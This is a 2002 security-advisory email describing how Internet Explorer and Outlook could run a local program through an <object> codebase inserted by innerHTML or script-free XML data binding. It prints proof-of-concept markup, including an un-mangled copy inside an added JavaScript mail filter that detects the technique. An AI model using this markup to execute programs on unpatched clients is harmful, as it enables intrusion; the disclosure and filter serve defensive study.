[NT] Executing Arbitrary Commands without Active Scripting or ActiveX
From: support@securiteam.com To: list@securiteam.com Date: Thu, 28 Feb 2002 13:22:50 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Executing Arbitrary Commands without Active Scripting or ActiveX
------------------------------------------------------------------------
SUMMARY
In an advisory from Jan 10 2002 "The Pull" demonstrated how it is still
possible to use an older bug (initially discovered by Dildog) in the
<object> HTML element to run arbitrary commands.
Although "The Pull"'s findings were interesting, his analysis of the
re-found bug was erroneous: the problem does not lie within the Popup
object; the problem is with dynamically inserted HTML fragments at any
point in the document.
All "createPopup" does is create a (featureless) window containing an
empty HTML document, which on its own poses no threat. The actual problem
is what happens later on, when HTML is injected into that document (using
innerHTML): the <object> element is instantiated at that point.
For example, the following code works just the same, with no popup
involved (the tag names "scr!pt" and "0bject" are mangled on purpose so
that the advisory itself cannot trigger the bug; read them as script and
object):
<span id="oSpan"></span>
<scr!pt language="jscript" defer>
oSpan.innerHTML='<0bject
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>';
</script>
(Note: innerHTML is not the only property that dynamically inserts HTML
into an element; outerHTML, insertAdjacentHTML and others give the same
result.)
DETAILS
Affected applications:
Any application that hosts the Web Browser control (5.5+) is affected
since this exploit does not require Active Scripting or ActiveX. Some of
these applications are:
* Microsoft Internet Explorer
* Microsoft Outlook
* Microsoft Outlook Express
Verified to be vulnerable:
* IE5.5sp2 Win98, all patches, Active scripting and ActiveX disabled.
* IE5.5sp2 NT4 sp6a, all patches, Active scripting and ActiveX disabled.
* IE6sp1 Win2000 sp2, all patches, Active scripting and ActiveX disabled.
* IE6sp1 WinXP, all patches, Active scripting and ActiveX disabled.
Now that we have identified the origin of the problem, we can search for
ways to dynamically insert HTML without using any Active Scripting at all.
It then becomes possible to use this bug in more "protected" environments,
such as Microsoft Outlook, or Internet Explorer with Active Scripting and
ActiveX disabled.
One of the features that came along in IE4 was Data Binding; it enables
developers to completely separate application data from the presentation
layer. The data source objects (DSOs) for Data Binding can be almost
anything: CSV files (with the TDC), HTML, XML and many more. Data Binding
binds HTML elements (data consumers) such as div or span to the DSO
without the need for a single line of script code.
When the "dataFormatAs" attribute is set to "HTML" on the consumer, Data
Binding internally uses innerHTML in order to insert the data into the
element (otherwise innerText is used).
So all we need to do now is supply a DSO that contains the offending
<object> element, the rest will be done for us by the Data Binding engine,
no scripting needed.
Exploit:
In the following example, we use an XML data island as our DSO and a span
element as the data consumer. Using XML is especially convenient because
it can be embedded within the document itself, without the need for
external requests that may be blocked by the host application. (As above,
the "0bject" tag name is mangled on purpose; read it as object.)
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<0bject id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
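Since the advisory offers no configuration workaround, the practical mitigation at the time was to inspect HTML before it reaches the Web Browser control (for example in a mail gateway). The following filter is an added example written for this page, not code from GreyMagic or Microsoft: it flags the two ingredients of the technique as described above, an <object> whose codebase points at a local path, and a data consumer bound with dataformatas="HTML", and also reports the script-side insertion sinks the advisory lists (innerHTML, outerHTML, insertAdjacentHTML). The function names, the blocking policy and the sample mail bodies are constructed for the example; the sample reuses the advisory's own markup with the tag names un-mangled.

```javascript
// Added example (not from the advisory): content filter for the GreyMagic
// data-binding / <object> codebase technique. Helper names, policy and the
// sample inputs below are constructed for this illustration.

const TAG_RE = /<([a-zA-Z][\w:-]*)\b([^>]*)>/g;
const ATTR_RE = /([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// IE DOM properties the advisory names as dynamic HTML insertion sinks.
const SCRIPT_SINKS = ['innerHTML', 'outerHTML', 'insertAdjacentHTML'];

// Parse the attribute part of a start tag into a lowercase-keyed map.
function parseAttrs(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// A codebase that is not a remote URL is treated as a local path; the
// advisory's samples use "c:/winnt/system32/calc.exe".
function isLocalCodebase(value) {
  const v = value.trim().toLowerCase();
  if (!v || /^(https?|ftp):\/\//.test(v)) return false;
  return /^(file:|[a-z]:[\\/]|\\\\|\/|\.{1,2}[\\/])/.test(v) || /\.exe$/.test(v);
}

// Walk every start tag and collect findings. Tags inside <![CDATA[ ... ]]>
// (the XML data island) are scanned too, since the binding engine will
// insert them as HTML.
function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(TAG_RE)) {
    const name = m[1].toLowerCase();
    const attrs = parseAttrs(m[2]);
    if (name === 'object' && 'codebase' in attrs && isLocalCodebase(attrs.codebase)) {
      findings.push({ kind: 'local-codebase-object', codebase: attrs.codebase,
                      classid: attrs.classid ?? null });
    }
    // Data consumer that renders bound data as HTML: the script-free path
    // to innerHTML described in the advisory.
    if ('datasrc' in attrs && (attrs.dataformatas ?? '').toLowerCase() === 'html') {
      findings.push({ kind: 'databinding-html-consumer', element: name,
                      datasrc: attrs.datasrc, datafld: attrs.datafld ?? null });
    }
  }
  // Script-based sinks are reported but not blocked on their own: they are
  // inert where Active Scripting is disabled and common in legitimate pages.
  for (const sink of SCRIPT_SINKS) {
    if (new RegExp(`\\.${sink}\\s*(=|\\()`).test(html)) {
      findings.push({ kind: 'script-html-sink', sink });
    }
  }
  return findings;
}

// Policy (constructed): reject a body that carries either a local-codebase
// <object> or an HTML-formatted data consumer. A static <object> is harmless
// per the advisory, but a local executable codebase has no legitimate use.
function shouldBlock(html) {
  return scanHtml(html).some(f =>
    f.kind === 'local-codebase-object' || f.kind === 'databinding-html-consumer');
}

// Constructed sample: the advisory's exploit with real tag names.
const SAMPLE_MAIL_BODY = [
  '<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>',
  '<xml id="oExec"><security><exploit><![CDATA[',
  '<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"',
  ' codebase="c:/winnt/system32/calc.exe"></object>',
  ']]></exploit></security></xml>',
].join('\n');

// Constructed benign sample: text-only binding and a remote codebase.
const BENIGN_BODY =
  '<span datasrc="#prices" datafld="amount"></span>\n' +
  '<object classid="clsid:22222222-2222-2222-2222-222222222222"' +
  ' codebase="http://example.invalid/ctl.cab#version=1,0,0,1"></object>';

console.log(scanHtml(SAMPLE_MAIL_BODY));
console.log('block sample:', shouldBlock(SAMPLE_MAIL_BODY),
            'block benign:', shouldBlock(BENIGN_BODY));
```

The scanner is deliberately regex-based rather than a full parser because the target is mail bodies that will be rendered by a lenient engine; a filter that gives up on malformed markup would miss exactly the inputs an attacker crafts. It does not attempt to decode entity-encoded or otherwise obfuscated attribute values, so treat it as a first-line check, not a complete defence.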
Solution:
There is no configuration-tweaking workaround for this bug; it works as
long as the browser parses HTML, since neither Active Scripting nor
ActiveX needs to be enabled. The only real fix must come in the form of a
patch from Microsoft.
Demonstration:
GreyMagic has put together two proof-of-concept demonstrations:
* Simple: attempts to run "c:/winnt/system32/calc.exe".
* Advanced: lets the user pick what they want to run.
They can both be found at http://security.greymagic.com/adv/gm001-ie/.
ADDITIONAL INFORMATION
The information has been provided by GreyMagic Software
(security@GREYMAGIC.COM).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.